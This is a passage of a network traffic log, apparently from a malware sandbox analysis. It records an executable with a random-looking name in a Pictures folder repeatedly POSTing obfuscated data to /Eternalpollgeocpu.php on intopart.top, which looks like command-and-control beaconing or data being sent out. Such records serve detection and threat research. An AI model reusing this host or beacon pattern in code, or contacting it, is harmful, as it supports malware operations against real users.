Apr 29, 2024 01:02:46.580988884 CEST	1080	OUT	Data Raw: 5d 5a 5a 51 50 5e 5e 52 54 56 50 51 5a 57 51 52 5b 52 5e 45 54 5c 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]ZZQP^^RTVPQZWQR[R^ET\PF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%-(7%.83&= ):+>+Q'3S8/-4]&: Z/!Z/
Apr 29, 2024 01:02:46.971839905 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JW2b9Ty3xjurT5WN5N3xGjh3UlFMP7xSUX%2Fy2urwa8ZzsfxmBPSLfSsgmA%2Fzz12XlV44TCkfxmj%2BER%2F0S9jahkcLN3IhDnQuG8ka9CphnRxsomEOLtzEaK2%2BMznxYFQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baae8c5e0b1136-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:46.971874952 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:47.257014990 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:02:47.366934061 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:47.368000031 CEST	1080	OUT	Data Raw: 5d 5d 5a 5b 55 5c 5b 57 54 56 50 51 5a 50 51 51 5b 58 5e 49 54 5d 50 40 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]]Z[U\[WTVPQZPQQ[X^IT]P@]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[%+ T#$>5_,&0'=<^.S(03'S/Y9##%3 Z/!Z/<
Apr 29, 2024 01:02:47.774390936 CEST	578	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxlbDKEg7Si4k1Un272gevFDd30s%2BmRE59Fw3D8L7%2BGrO5m%2FEj0u30u8oTcULRHMs9kM%2FJaEllkgQOMsg1Rb8UGLZXt1MR3%2F8M7U%2FhLAuRVpMQWSkAW7pWiElksp4MU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baae91bcb51257-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:02:47.774416924 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49750	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:50.641678095 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1076 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:50.752095938 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:50.752243042 CEST	1076	OUT	Data Raw: 58 59 5a 5a 50 5a 5e 55 54 56 50 51 5a 56 51 57 5b 5e 5e 47 54 5e 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XYZZPZ^UTVPQZVQW[^^GT^PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'X'-#T?&2/(Q$=;=>(>(3 'V-/=[#*' Z/!Z/4
Apr 29, 2024 01:02:51.163127899 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6hYsowBZU0NFNKueNV4G0Hi502R8mN1og4KGAfPrpe%2BLge6kndQ0bmvcVSZ0sVwtO%2B5lYvZS9D4Pa%2FJidj4II7yqwQWeXicxmOnmwZ22LC3h55Cc%2FHwv%2FsyY6l7NIfo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaea6ec048716-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:51.163356066 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:51.670948029 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:51.780884027 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:51.781075001 CEST	1080	OUT	Data Raw: 58 5d 5f 5a 50 5c 5e 51 54 56 50 51 5a 54 51 5b 5b 59 5e 46 54 5b 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X]_ZP\^QTVPQZTQ[[Y^FT[PF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'2><#"/12; T3 [=2?='Q&0?R-?# )&: Z/!Z/,
Apr 29, 2024 01:02:52.167500973 CEST	591	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mzzxr6HvJPQ0xVADp6CotRTxwyk8%2FwnZP5Dy%2Bmi%2BWw7V%2FLtiRR%2BhyJgYq8Szyx2%2FY9S6jtUjC2vCC%2FlsHJ4THkbarOfSjNHSXHOne4c%2BxuVBktswo0LNmz9SrfpQsK8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaead4d19615d-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:52.167524099 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49753	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:52.660198927 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:02:52.771140099 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:52.771392107 CEST	1080	OUT	Data Raw: 5d 58 5a 5a 50 5d 5b 57 54 56 50 51 5a 52 51 55 5b 59 5e 42 54 52 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]XZZP][WTVPQZRQU[Y^BTRPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_']%8#'1.)[/5#3.8Y==<=338<%[ U%0 Z/!Z/4
Apr 29, 2024 01:02:53.193265915 CEST	587	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fP%2BFzUGnyEaieZZmHG2p4SrIqnY8x7Mkkg%2F%2B7bg170sT6hhJvbnAgmsKCtj215%2BbUTGbOjQX%2B%2BOOB0rb86sC9vcZo0IIzlri3gyuXaZJm6d730hGUE2TXmeK09IXEE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaeb37cbc22f3-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:53.193293095 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49754	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:53.628154039 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:53.737972975 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:53.738171101 CEST	1080	OUT	Data Raw: 58 58 5a 50 55 5f 5e 54 54 56 50 51 5a 52 51 55 5b 59 5e 40 54 5e 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XXZPU_^TTVPQZRQU[Y^@T^PA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y1>$_72?1.*86#0=X(9"<=$#;T//)\705$ Z/!Z/4
Apr 29, 2024 01:02:54.126348019 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZWWCBq3KfN5rMEUGBNLD%2FUbRjEjv0XE1AuaSkhmlcoyrub90rznHIgcInfQgmnbsCbInl0o1KgBxzCtToAAl1X9MTS5oJmRt%2BTd9sIp7DKZyspPPUJx0bnGynesKvk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaeb98fa561ed-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:54.128953934 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49756	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:54.587057114 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:54.698595047 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:54.841300011 CEST	1080	OUT	Data Raw: 58 59 5a 59 55 5d 5e 55 54 56 50 51 5a 50 51 5a 5b 53 5e 46 54 5a 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XYZYU]^UTVPQZPQZ[S^FTZPF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'%( 3%>;/0>/)\-+ 33+8,> 3Z& Z/!Z/<
Apr 29, 2024 01:02:55.235618114 CEST	587	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SDKIsNf0nfIIYf2AeYJxX2%2BHA18zesI5AbqniCcOzBhLGhbWVF4COuFLf1C5DhSJrjr4TXxGRhSCB3%2B%2F9E%2BM65DKPTw7pdg9NW6SS4%2F76gDm%2BSnz64hqlzaJ1vUvi5s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaebf89ac2988-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:55.235646009 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49757	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:56.111556053 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:56.222381115 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:56.222707033 CEST	1080	OUT	Data Raw: 58 58 5a 5f 50 5b 5e 52 54 56 50 51 5a 57 51 50 5b 59 5e 47 54 5c 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XXZ_P[^RTVPQZWQP[Y^GT\PB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'& _7^$.=_,C,V'- _=:))-#$33R8/>"#&'* Z/!Z/
Apr 29, 2024 01:02:56.655632019 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WroCyDClRWIWPOU2DMgpHsUYqTROd3dZ1ougTjQg5lUwjSzFyyOoV%2Bq7jGmn1nF9sGhQZsy3DElvubnDldy%2Bc2P5YnHWVU4P6QiGQ0hfA4velQyym0ssnFxcqoFOWj4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaec91a83e1df-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:56.655657053 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49758	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:56.698055983 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:56.808043003 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:56.808614969 CEST	1788	OUT	Data Raw: 5d 5f 5f 5d 50 5c 5e 52 54 56 50 51 5a 54 51 5a 5b 5a 5e 43 54 58 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]__]P\^RTVPQZTQZ[Z^CTXPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y'=(\ 8]%."85'#*):U?7W$#894U)3 Z/!Z/,
Apr 29, 2024 01:02:57.237797976 CEST	734	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cmZ%2BRFrzk%2BWraaIFo%2B2NhkfaTFdSFOw6R22ZHz6kKRMq0ErDPoQMTWhFAoL8ejqDspigPdDgoall3A8B5LB8lQryjo2YOIfW7uAHtWxdXGTRsg5HrXfNL%2Fy%2BVyzpo00%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaeccbca662c3-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 13 28 15 25 56 28 32 2a 52 33 22 27 50 31 11 24 40 28 2f 21 1a 26 55 23 04 2f 2e 26 52 27 0a 2c 5b 20 07 30 5e 26 57 2b 56 2b 24 20 59 02 1c 39 45 24 29 08 5f 32 3e 20 07 28 32 2a 07 21 10 06 59 3e 2b 3e 53 27 2c 22 06 3c 23 39 01 28 17 3f 0e 2d 2e 3e 04 25 37 3b 53 3e 25 2c 52 08 13 20 10 3f 0e 37 09 20 2b 34 0e 24 22 07 01 27 36 2f 57 23 38 09 0d 2b 3a 34 5f 30 31 3a 5c 32 0c 31 0d 39 30 3b 07 34 2f 22 01 24 2d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 (%V(2R3"'P1$@(/!&U#/.&R',[ 0^&W+V+$ Y9E$)_2> (2!Y>+>S',"<#9(?-.>%7;S>%,R ?7 +4$"'6/W#8+:4_01:\2190;4/"$-!\/ I4]S
Apr 29, 2024 01:02:57.237848043 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Apr 29, 2024 01:02:57.249196053 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:02:57.359153986 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:57.359373093 CEST	1080	OUT	Data Raw: 58 5f 5a 5b 50 5e 5b 50 54 56 50 51 5a 5e 51 50 5b 5e 5e 49 54 53 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X_Z[P^[PTVPQZ^QP[^^ITSPF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&=,Z41,\19_,% W$=(Z))>(='33/-?5[ 0)'* Z/!Z/
Apr 29, 2024 01:02:57.655359030 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUSMDm%2Bwe1yPYATIx1BnBCqGGtJ6eHMKWy4Djb41AH5W725aLmEoMZQej%2BpRQe2ZNIgKnJt8iTSW%2FkzaNqlhKlb6MzBiN%2Bx1uAsJ%2BHfzMC90OgbXeEDo6mSWvouKg2c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaed0286062c3-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:57.655412912 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49761	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:57.922349930 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:02:58.032473087 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:02:58.032681942 CEST	1080	OUT	Data Raw: 58 5d 5a 51 55 56 5e 53 54 56 50 51 5a 5e 51 5b 5b 59 5e 41 54 5c 50 40 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X]ZQUV^STVPQZ^Q[[Y^AT\P@]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Z& 4"1.=[;/3#*)2<=0$3;;<9X"#)$: Z/!Z/
Apr 29, 2024 01:02:58.427437067 CEST	587	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TcZI%2F%2BLtymoFFJxa3trAL9D5%2F%2FUilVJ9H2HRFJgYauDKfYW9Bev239ViWJFXtpI%2FXp1R16qtGteydQi723JZeIaTo1DKT4Wm%2FKbBuB9Hh7FAz6ktB8cWpi7RnEkQgjk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaed4695610d4-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:02:58.427458048 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49762	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:02:58.704065084 CEST	257	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue Connection: Keep-Alive
Apr 29, 2024 01:02:58.814471960 CEST	25	IN	HTTP/1.1 100 Continue
